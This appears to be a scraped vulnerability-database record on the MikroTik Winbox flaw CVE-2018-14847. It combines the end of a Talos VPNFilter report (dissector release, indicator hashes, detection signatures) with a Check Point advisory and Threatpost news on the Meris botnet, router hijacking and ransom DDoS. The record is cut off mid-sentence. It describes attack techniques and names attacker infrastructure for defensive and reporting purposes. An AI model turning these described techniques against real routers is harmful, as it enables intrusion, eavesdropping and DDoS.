properties: \n\n\n * Multiple messages sent in the same packet.\n * Messages containing one or more two-byte \"chunks\" that need to be removed before parsing.\n * Messages too long for a single packet \u2014 TCP reassembly applied.\n * Messages containing additional \"nested\" messages\nHere is how the capture is displayed before installing the dissector: \n\n\n[](<https://4.bp.blogspot.com/-Y6bIpGj74pc/W6uQlLqJpwI/AAAAAAAAAzo/lXw2AvRsQJ48OBPHe-ESqVEAO1fXOhUhgCLcBGAs/s1600/image1.png>)\n\nThe communications are correctly parsed in Wireshark following installation of the Winbox protocol dissector: \n\n\n[](<https://4.bp.blogspot.com/-koiAk2C71Kw/W6uQpoeyiOI/AAAAAAAAAzs/ug0oWJDeZdknnq-ZGhM1xP5epx2s7TWGACLcBGAs/s1600/image2.png>)\n\n### Obtaining the Dissector\n\n \nTo improve the security community's ability to analyze these communications and to monitor for threats that may attempt to take advantage of the Winbox Protocol, Cisco Talos is releasing this dissector for public use. For additional information and to obtain the dissector, please see the GitHub repository [here](<https://github.com/Cisco-Talos/Winbox_Protocol_Dissector>). \n \n\n\n## Conclusion\n\n \nAs a result of the capabilities we previously discovered in VPNFilter coupled with our new findings, we now confirm that VPNFilter provides attackers all of the functionality required to leverage compromised network and storage devices to further pivot into and attack systems within the network environments that are being targeted. \n \nIt also allows attackers to leverage their access to sensitive systems such as gateway and routing devices to perform activities such as network mapping and endpoint exploitation, network communications monitoring and traffic manipulation, among other serious threats. Another dangerous capability provided by VPNFilter is the ability to turn compromised devices into proxies that could be leveraged to obfuscate the source of future, unrelated attacks by making it appear as if the attacks originate from networks previously compromised by VPNFilter. The sophisticated nature of this framework further illustrates the advanced capabilities of the threat actors making use of it, as well as the need for organizations to deploy robust defensive architectures to combat threats such as VPNFilter. \n \nWith this new understanding of VPNFilter, most of our unanswered questions about the malware itself have now been answered. However, there are still significant unknowns about this threat that linger to this day: \n \n**How did the actor gain initial access to affected devices? ** \n \nWhile we strongly assess that they utilized widely known, public vulnerabilities based on the makes/models affected by VPNFilter, we still don't have definitive proof of this. \n \n**Is the actor attempting to reconstitute their access? ** \n \nBased on our telemetry and information from our partners, it appears that VPNFilter has been entirely neutralized since we and our international coalition of partners (law enforcement, intelligence organizations, and the [Cyber Threat Alliance](<https://www.cyberthreatalliance.org/>)) countered the threat earlier this year. Most C2 channels for the malware have been mitigated. The stage 2 implants were non-persistent, so most have likely been cleared from infected devices. We have seen no signs of the actor attempting to reconnect with devices that may still have the persistent stage 1 with an open listener. \n \nDoes this mean the actor has abandoned this expansive foothold into the small and home office (SOHO) network device space? Are they instead reconstituting their access by starting over, re-exploiting and dropping new unknown malware? Have they given up on having broad worldwide SOHO access in favor of a more tailored approach only going after specific key targets? \n \nWhatever the answers may be, we know that the actor behind VPNFilter is extremely capable and driven by their mission priorities to continually maneuver to achieve their goals. In one form or another, they continue to develop and use the tools and frameworks necessary to achieve their mission objective(s). \n \n\n\n## IOCs\n\n \na43a4a218cf5755ce7a7744702bb45a34321339ab673863bf6f00ac193cf55fc \naac52856690468687bbe9e357d02835e9f5226a85eacc19c34ff681c50a6f0d8 \n13165d9673c240bf43630cddccdc4ab8b5672085520ee12f7596557be02d3605 \nb81f857cd8efab6e6e5368b1c00d93505808b0db4b773bee1843a3bc948d3f4f \n809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f61a \n7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e261086e0 \n81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d38c7 \nb301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e3f5 \n99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404cc7 \n76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7f0f \ne009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae273566b0 \n7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb643 \nf8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd910a \n4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c828 \nf1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef9fb8 \n8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee44ff \na249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe072 \n5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb177b \nfe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b1943dd \n116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e6bc9 \n4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee2c8 \n5d70e7dd5872cc0d7d0f7015c11400e891c939549c01922bff2bbe3b7d5d1ce3 \n5c52f115ab8a830d402fac8627d0bfdcbbfd4dcf0e6ad8154d49bb85387893aa \ne75e224c909c9ead4cb50cd772f606407b09b146051bfb28015fcbe27b4a5e8d \n999f14044f41adfd9fb6c97c04d7d2fd9af01724b3ab69739acf615654abfa43 \nb118b23a192f372616efe8c2b12977d379ac76df22493c14361587bd1cc8a804 \n7ba0dc46510492a7f6c9b2bcc155333898d677cd8a88fe0e1ac1ad3852f1c170 \n83b3dbf7f6bc5f98151b26781fa892fc1a014c62af18c95ae537848204f413b8 \nfce03f57b3fd3842efac3ce676687794c4decc29b612068e578134f3c4c4296a \n1f26b69a353198bb047dde86d48198be8271e07f8c9d647d2f562207e1330a37 \n1e824654afba03678f8177e065c487a07192069711eeb4abe397010771b463b5 \n84227f906c7f49071d6598b9035fc785d2b144a6349d0cf7c29177c00db2dc2f \n6eb09f805a68b29c9516d649019bea0bb4796e504ca379783455508a08f61087 \naa5baa135b2ada5560833747260545d6a5b49558f6244c0f19443dc87c00294d \n4c5e21125738c330af1bfe5cabc5f18fa14bbef53805dda2c3c31974555f7ec5 \n0f3746f273281472e7181f1dd1237f0c9fc26f576a883f42413c759f381006c4 \nacfc72b8d6611dc9cd6a3f1a4484aa0adfb404ad5faaa8b8db5747b0ff05bc22 \nfe9c17ac036622b2d73466f62b5d095edda2d3b60fa546a48d0bb18f8b11059f \n830091904dab92467956b91555bc88fa7e6bbde514b8a90bb078c8a3bb2f39a9 \n5a28ad479d55275452e892b799c32803f81307079777bb1a5c4d24477206d16b \n8440128350e98375b7eff67a147dfe4e85067d67f2ad20d9485f3de246505a5f \n275c4e86218915c337d7e37e7caba36cb830512b17353bf9716c4ba6dceb33ed \nb700207c903e8da41f33f11b69f703324ec79eb56c98b22efaeac0a10447ec44 \n2aa149a88539e8dd065c8885053a30d269be63d41a5db3f66c1982202761aa75 \n1a11240d0af108720de1a8a72ceadef102889f4d5679c1a187559d8d98143b0b \n3b6be595b4183b473964345090077b1df29b0cace0077047b46174cc09c690e1 \n620c51f83457d0e8cb985f1aff07c6d4a33da7566297d41af681ae3e5fbd2f80 \n4c8da690501c0073a3c262a3079d8efac3fea9e2db9c55f3c512589e9364e85c \nd92282acf3fea66b05a75aba695e98a5ea1cc1151f9e5370f712b69a816bf475 \n30382c1e7566d59723ff7ef785a1395711be64873dbca6d86691b1f5d86ba29f \n \n\n\n## Coverage\n\n \nThe following new coverage has been developed to detect additional modules used by VPNFilter \n \n**New Snort for ndbr:** \n \nsid:1:47377:1 \n \n**New Clam AV:** \n \nUnix.Trojan.Vpnfilter_htpx-6596262-0 \nUnix.Trojan.Vpnfilter_ndbr-6598711-0 \nUnix.Trojan.Vpnfilter_netfilter-6599563-0 \nUnix.Trojan.Vpnfilter_nm-6598714-0 \nUnix.Trojan.Vpnfilter_portforwarding-6599587-0 \nUnix.Trojan.Vpnfilter_socks5proxy-6599614-0 \nUnix.Trojan.Vpnfilter_tcpvpn-6606298-0 \n \n**Updated Clam AV: ** \n \nThe following ClamAV signatures were updated to improve detection of additional Stage 1 and Stage 2 modules used by VPNFilter: \n \nUnix.Trojan.Vpnfilter-6425812-1 \nUnix.Trojan.Vpnfilter-6550592-1 \n \n\n\n", "cvss3": {}, "published": "2018-09-26T07:59:00", "type": "talosblog", "title": "VPNFilter III: More Tools for the Swiss Army Knife of Malware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2018-14847"], "modified": "2018-09-26T19:31:00", "id": "TALOSBLOG:744C774279644C0E2B83FB09F7352468", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/2MO3kUK13Q8/vpnfilter-part-3.html", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:26:37", "description": "An authentication bypass vulnerability exists in the Winbox component of Mikrotik RouterOS. A remote attacker could exploit this flaw by sending specially crafted packets to the affected server. Successful exploitation of this vulnerability would allow a remote attacker to hijack a user's session and escalating their access.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2018-08-06T00:00:00", "type": "checkpoint_advisories", "title": "MikroTik RouterOS Winbox Authentication Bypass (CVE-2018-14847)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2018-08-21T00:00:00", "id": "CPAI-2018-0830", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "threatpost": [{"lastseen": "2021-09-13T14:38:34", "description": "Technical details tied to a record-breaking distributed-denial-of-service (DDoS) attack against Russian internet behemoth Yandex are surfacing as the digital dust settles. A massive botnet, dubbed M\u0113ris, is believed responsible, flooding Yandex with millions of HTTP requests for webpages at the same time.\n\nThis DDoS technique is called HTTP pipelining, where a browser requests a connection to a server and, without waiting for a response, sends multiple more requests. Those requests reportedly originated from networking gear made by MikroTik. Attackers, according to Qrator Labs, exploited a 2018 bug unpatched in more than 56,000 MikroTik hosts involved in the DDoS attack.\n\nAccording to Qrator, the M\u0113ris botnet delivered the largest attack against Yandex it has ever spotted (by traffic volume) \u2013 peaking at 21.8 million requests per second (RPS). By comparison, infrastructure and website security firm Cloudflare reported that the \u201c[largest ever](<https://blog.cloudflare.com/cloudflare-thwarts-17-2m-rps-ddos-attack-the-largest-ever-reported/>)\u201d DDoS attack occurred on August 19, with 17.2 million RPS.\n\n## The Looming M\u0113ris Monster\n\nResearchers have linked M\u0113ris to the August 19 DDoS attack tracked by Cloudflare. The Yandex attacks occurred between August 29 through September 5 \u2013 when the 21.8 million RPS attack occurred. Both are believed to be smaller precursor attacks by threat actors behind the M\u0113ris botnet, which have yet to utilize the enormous firepower. \n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\n\u201cYandex\u2019 security team members managed to establish a clear view of the botnet\u2019s internal structure. L2TP [Layer 2 Tunneling Protocol] tunnels are used for internetwork communications. The number of infected devices, according to the botnet internals we\u2019ve seen, reaches 250,000,\u201d [wrote Qrator in a Thursday blog post](<https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/>).\n\nL2TP is a protocol used to manage virtual private networks and deliver internet services. Tunneling facilitates the transfer of data between two private networks across the public internet.\n\nYandex and Qrato launched an investigation into the attack and believe the M\u0113ris to be highly sophisticated.\n\n\u201cMoreover, all those [compromised MikroTik hosts are] highly capable devices, not your typical IoT blinker connected to Wi-Fi \u2013 here we speak of a botnet consisting of, with the highest probability, devices connected through the Ethernet connection \u2013 network devices, primarily,\u201d researchers wrote.\n\n## Early Warnings Ignored?\n\nThe technical attack specifics include the exploitation of a 2018 vulnerability, tracked as [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>). Tenable Research [warned at the time](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) of its disclosure that the bug needed to be taken extremely seriously, because a newly found hack technique allowed for remote code execution on MikroTik edge and consumer routers.\n\n\u201cWe are now able to show how an attacker can use it to get root shell on a system. It uses CVE-2018-14847 to leak the admin credentials first and then an authenticated code path gives us a back door,\u201d Tenable told Threatpost in 2018.\n\nWhile MikroTik patched CVE-2018-14847 back then, Tenable has now revealed that only approximately 30 percent of vulnerable modems have been patched, which leaves approximately 200,000 routers vulnerable to attack. MikroTik\u2019s RouterOS powers its business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\nQrato recent analysis of the DDoS attack revealed that the compromised hosts each had open ports 2000 (Bandwidth test server) and 5678 (Mikrotik Neighbor Discovery Protocol). Researchers reported 328,723 active hosts on the internet replying to the TCP probe on port 5678.\n\n## Mitigating a Monster\n\nWhile patching MikroTik devices is the most ideal mitigation to combat future M\u0113ris attacks, researchers also recommended blacklisting.\n\n\u201cSince those [M\u0113ris] attacks are not spoofed, every victim sees the attack origin as it is. Blocking it for a while should be enough to thwart the attack and not disturb the possible end user,\u201d wrote researchers.\n\n\u201c[It\u2019s] unclear how the\u2026owners for the M\u0113ris botnet would act in the future \u2013 they could be taking advantage of the compromised devices, taking 100 percent of its capacity (both bandwidth and processor-wise) into their hands. In this case, there is no other way other than blocking every consecutive request after the first one, preventing answering the pipelined requests.\u201d\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on September 22 at 2 PM EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.2}, "published": "2021-09-10T16:31:14", "type": "threatpost", "title": "Yandex Pummeled by Potent Meris DDoS Botnet", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847"], "modified": "2021-09-10T16:31:14", "id": "THREATPOST:2E5940B4290E375F15EAA2246BBD6EFF", "href": "https://threatpost.com/yandex-meris-botnet/169368/", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2019-09-05T08:21:36", "description": "A full 7,500+ MikroTik routers are forwarding their owners\u2019 traffic to eavesdropping cybercriminals \u2013 while 239,000 more have had their Socks4 proxy enabled, maliciously and surreptitiously. This means the bad actors can gain access to any of the files or data being passed by the router to and from corporate networks.\n\nAccording to security researchers at 360 Netlab, adversaries are exploiting the known MikroTik [CVE-2018-14847](<https://n0p.me/winbox-bug-dissection/>) vulnerability in Winbox, which is a management component and a Windows GUI application for MikroTik\u2019s RouterOS software. RouterOS powers the business-grade RouterBOARD brand, as well as ISP/carrier-grade gear from the vendor.\n\nThe flaw is a Winbox Any Directory File that allows bad actors to read files that flow through the router without authentication; while MikroTik patched it in early August, many users have yet to update, leaving a large attack surface open.\n\nIn fact, as of August 24, the 360 Netlab honeypot network had picked up on more than 5 million devices with an open TCP/8291 port worldwide, of which 1.2 million are MikroTik devices. Out of those, about 31 percent, or 370,000, are vulnerable to the flaw.\n\n\u201cThe MikroTik RouterOS device allows users to capture packets on the router and forward the captured network traffic to the specified Stream server,\u201d the researchers explained, in [a post](<https://blog.netlab.360.com/7500-mikrotik-routers-are-forwarding-owners-traffic-to-the-attackers-how-is-yours-en/>) on Tuesday, adding that attackers are listening to ports 20, 21, 25, 110 and 143, corresponding to FTP-data, FTP, SMTP, POP3 and IMAP traffic. Also, oddly, snmp port 161 and 162 are also under surveillance.\n\n\u201cThis deserves some questions,\u201d the researchers pointed out. \u201cWhy are the attackers paying attention to the network management protocol regular users barely use? Are they trying to monitor and capture some special users\u2019 network snmp community strings? We don\u2019t have an answer at this point, but we would be very interested to know what the answer might be.\u201d\n\nMost of the 7,500 victims are in Russia, the firm found; and in terms of the collecting IP addresses, 37.1.207.114 is the top player among all the attackers.\n\n\u201cWe must note these are carrier-grade routers that have been compromised,\u201d [Troy Mursch](<https://twitter.com/bad_packets>), researcher at Bad Packets Report, told Threatpost. \u201cBecause of this, the amount of information (data) passing through them is far greater than some simple SOHO router. This also means they may be routing traffic for a government organization, corporation or any other large enterprise. Snooping file transfers (FTP), email (SMTP/POP3/IMAP), and even SNMP traffic can yield a wealth of information about the targeted organization. This information can in turn be used against them to further compromise and/or surveil their network. Hackers can also sell this data to third-parties for malicious purposes, as we find numerous Dark Web shops peddling this kind of stuff.\u201d\n\nAs for the Socks4 proxy enablement, researchers found that a single malicious actor is behind that campaign \u2013 and that the motive remains to be seen.\n\n\u201cThe Socks4 port is mostly TCP/4153, and very interestingly, the Socks4 proxy config only allows access from one single net-block 95.154.216.128/25,\u201d the researchers explained. \u201cIn order for the attacker to gain control even after device reboot ([an] IP [address] change), the device is configured to run a scheduled task to periodically report its latest IP address by accessing a specific attacker\u2019s URL.\u201d\n\nThe attacker also uses compromised Socks4 proxies to scan more MikroTik RouterOS devices for vulnerabilities.\n\n\u201cIt is hard to say what the attacker is up to with these many Sock4 proxies, but we think this is something significant,\u201d the researchers added.\n\nMursch told us, \u201cAs Netlab360 notes in one example, the proxy was used to scan for additional MikroTik routers to compromise without revealing the hacker\u2019s real IP address. The proxy access can also be sold/given to other miscreants for any/all other malicious purposes.\u201d\n\nThe situation is once again a [wake-up call to patching](<https://threatpost.com/threatlist-financial-services-firms-lag-in-patching-habits/134750/>). MikroTik RouterOS users should update their software, and check whether the HTTP proxy, Socks4 proxy or network traffic-capture function are being maliciously exploited.\n\nA similar situation arose in August when [tens of thousands of MikroTik routers](<https://threatpost.com/huge-cryptomining-attack-on-isp-grade-routers-spreads-globally/134667/>) were found to have been compromised, with the actors embedding the Coinhive cryptomining scripts into websites using a known vulnerability.\n\n\u201cThis [latest] report clearly shows that scraping for pennies with Coinhive is not the worst-case scenario that miscreants can do with these compromised MikroTik routers,\u201d Mursch told Threatpost.\n", "cvss3": {}, "published": "2018-09-04T18:34:10", "type": "threatpost", "title": "Thousands of MikroTik Routers Hijacked for Eavesdropping", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-14847", "CVE-2019-12643"], "modified": "2018-09-04T18:34:10", "id": "THREATPOST:29B457A3AC4B513C7DA2C181E899EBBF", "href": "https://threatpost.com/thousands-of-mikrotik-routers-hijacked-for-eavesdropping/137165/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T22:51:44", "description": "Hey webop_geeks, you_are_already_dead, a note claiming to be left by the REvil ransomware gang declared, embedded into the attack itself as a string of text in the URL for the extortion demand.\n\nImperva reported the interesting twist on Friday \u2013 one of several it\u2019s seen in the evolution of distributed denial-of-service (DDoS) attacks so far this year.\n\nIn a [post](<https://www.imperva.com/blog/imperva-mitigates-ransom-ddos-attack-measuring-2-5-million-requests-per-second/>) that detailed mitigation of a recent attack that hit up to 2.5 Mrps (millions of requests per second) on a single website, Imperva\u2019s Nelli Klepfish shared several chest-thumping ransom notes \u2013 a screen capture of one is included below \u2013 that its targeted customer received before the attack started.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04144634/DDoS-Attack-March-Image-2_png-e1646423206575.jpg>)\n\nA ransomware note ransom note embedded into the attack\u2019s URL extortion demand. Source: Imperva.\n\n\u201cWe are observing more cases like this where the ransom note has been included as part of the attack itself, perhaps as a reminder to the target to send their bitcoin payment,\u201d Klepfish wrote. \u201cOf course, once the target receives this note, the attack is already underway, adding a sense of urgency to the threat.\u201d\n\nThis was only one of several threatening ransom notes the target received before the 2.5 Mrps DDoS attack began, and the specific message shown above was one of more than 12 million embedded requests that targeted random pages on the same site.\n\nThe 2.5 Mbps attack was the highest pitter-patter Imperva\u2019s ever wrangled, but it\u2019s nowhere near the highest ever. That undesirable trophy likely goes to the 2.5 Tbps DDoS that [hit Google](<https://cloud.google.com/blog/products/identity-security/identifying-and-protecting-against-the-largest-ddos-attacks>) in September 2017, sending 167 Mps to 180,000 exposed CLDAP, DNS, and SNMP servers that turned around and sent back big, choke-you packets.\n\n\u201cWhile ransom DDoS attacks are not new, they appear to be evolving and becoming more interesting with time and with each new phase,\u201d Imperva observed.\n\nAnother threatening message, shown below, told \u201cwebops_geeks\u201d to inform their bosses that they\u2019d need to start coughing up 1 Bitcoin a day \u2013 worth the tidy sum of about USD $40K, as of Friday \u2013 if they wanted to stay online. It, and other embedded messages, were signed \u201crevil_this_is_our_dominion.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04151615/DDoS-Attack-March-Image-3_png-e1646424987225.jpg>)\n\nAnother message incorporated into one of the targeted URLs. Source: Imperva.\n\nWhether or not the attacks have anything to do with the REvil ransomware-as-a-service (RaaS) [gang](<https://threatpost.com/how-revil-may-have-ripped-off-its-own-affiliates/174887/>) or are just coming from an imposter is anybody\u2019s guess. Russia made a show of [busting up](<https://threatpost.com/russian-security-revil-ransomware/177660/>) REvil in January, with its Federal Security Service (FSB) claiming to have raided gang hideouts; seized currency, cars and personnel; and neutralized REvil\u2019s infrastructure at the request of the United States. But as these things go, cybercrook gangs are like blobs of jelly: You squeeze one end, and the action pops up somewhere else as members join other cybercriminal gangs.\n\nREvil does have a history of DDoS ransomware, though. In October 2021, a British voice-over-IP (VoIP) firm \u2013 Voice Unlimited \u2013 was still [recuperating](<https://www.theregister.com/2021/10/08/voip_unlimited_limited_by_outage/>) a month after a series[ of apparent sustained DDoS](<https://status.voip-unlimited.net/>) attacks that were attributed to REvil.\n\n## Threatening to Tank Victim\u2019s Stocks\n\nThe next day, the attackers sent over 15 million requests to the same site, this time with a new message that warned the CEO that the attackers would eviscerate the company\u2019s stock price by \u201chundreds_of_millions_in_market_cap.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04173034/stock_price-e1646433046983.jpg>)\n\nMessage threatening the stock price. Source: Imperva.\n\nThe attacks kept coming for several days, lasting up to several hours and, in 20 percent of cases, hitting between 90 and 750 thousand requests per second (Krps).\n\n## Born of the Brawny Meris Botnet\n\nEvidence points to the DDoS attacks coming from the massive Meris botnet. Meris sucks its power out of the thousands of internet-of-things (IoT) devices that have been hijacked thanks to a years-old [vulnerability](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>), tracked as CVE-2018-14847, in MicroTik routers.\n\n\u201cAlthough CVE-2018-14847 was published a while ago, attackers can still take advantage of it,\u201d Imperva pointed out.\n\nAnd how. The Meris botnet was behind the record-breaking DDoS attack that [targeted](<https://threatpost.com/yandex-meris-botnet/169368/>) Russia\u2019s version of Google \u2013 Yandex \u2013 in September 2021. Other targets for Meris in 2021 included cybersecurity media sites Krebs on Security and Infosecurity, as well as New Zealand banks, its post mail service and the country\u2019s MetService weather service.\n\nThey\u2019re all cases in point for the fact that DDoS attacks [shattered records](<https://threatpost.com/ddos-attacks-records-q3/176082/>) in Q3.\n\nWhile the largest attack to hit Imperva\u2019s customer reached 2.5 Mrps, the company blocked over 64 million requests in under one minute, as shown in the graph below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04165034/Imperva_graph-e1646430646948.jpg>)\n\nGraph showing over 64 million requests blocked in under one minute. Source: Imperva.\n\nThe top originating countries were Indonesia and the United States, as shown in the pie chart below. \u201cWe have seen a pattern emerging of almost identical source locations for different attacks, indicating that the same botnet was used many times,\u201d Imperva said.\n\nThe attacks took only seconds to mitigate, given that the sources, which impersonated legitimate browsers or a Google bot, were known to be malicious.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/04165505/Top_countries-e1646430917193.jpg>)\n\nTop originating countries. Source: Imperva.\n\nThe threat actors focused on business sales and communications sites, mainly based in the United States or Europe, that had the commonality of being exchange-listed. All the better to scare you with threats to stock price, my dear, Imperva noted: \u201cThe threat actors use this to their advantage by referring to the potential damage a DDoS attack could do to the company stock price.\u201d\n\nNow is the time to prepare for an attack, Imperva warned, particularly given the threat actors\u2019 promise \u2013 be they REvil or REvil wannabes \u2013 to keep hammering away.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-04T22:46:59", "type": "threatpost", "title": "Massive Meris Botnet Embeds Ransomware Notes from REvil", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2021-44228"], "modified": "2022-03-04T22:46:59", "id": "THREATPOST:436D209F4CB01B99FC9576DFE08DE145", "href": "https://threatpost.com/massive-meris-botnet-embeds-ransomware-notes-revil/178769/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:17:10", "description": "A vulnerability in some Huawei routers used for carrier ISP services allows cybercriminals to identify whether the devices have default credentials or not \u2013 without ever connecting to them.\n\nCVE-2018-7900 exists in the router panel and allows credentials information to leak \u2013 so attackers can simply perform a [ZoomEye](<https://www.zoomeye.org/>) or Shodan IoT search to find list of the devices having default passwords \u2013 no need for bruteforcing or running the risk of running into a generic honeypot.\n\n\u201cWhen someone has a look on the html source code of login page, few variables are declared. One of the variables contain a specific value. By monitoring this specific value, one can come to the conclusion that the device has the default password,\u201d explained Ankit Anubhav, principal researcher at NewSky Security, [in a posting](<https://blog.newskysecurity.com/information-disclosure-vulnerability-cve-2018-7900-makes-it-easy-for-attackers-to-find-huawei-3e7039b6f44f>) on Wednesday. \u201cThe attacker can simply go to ZoomEye, find a list of devices, login, and do what they want with minimal hacking skills. As easy as that.\u201d\n\nHuawei has issued a fix and worked with its carrier customers to implement it across networks.\n\nNewSky said it wouldn\u2019t disclose exact details of the flaw nor the numbers of affected devices that it uncovered during its own ZoomEye search (though Anubhav referred to the numbers of affected devices as \u201cconcerning\u201d).\n\nThis is only the latest issue affecting carrier-level gear \u2013 and it\u2019s a problematic trend given the scope of the potential attack surface.\n\n\u201cThe attack vectors which can infect a huge number of IoT devices are much favored than a using a vulnerability in a vendor which has only 500 devices online,\u201d said Anubhav. \u201cHence, in 2018 we saw [CVE-2018-14847](<https://threatpost.com/poc-attack-escalates-mikrotik-router-bug-to-as-bad-as-it-gets/138076/>) 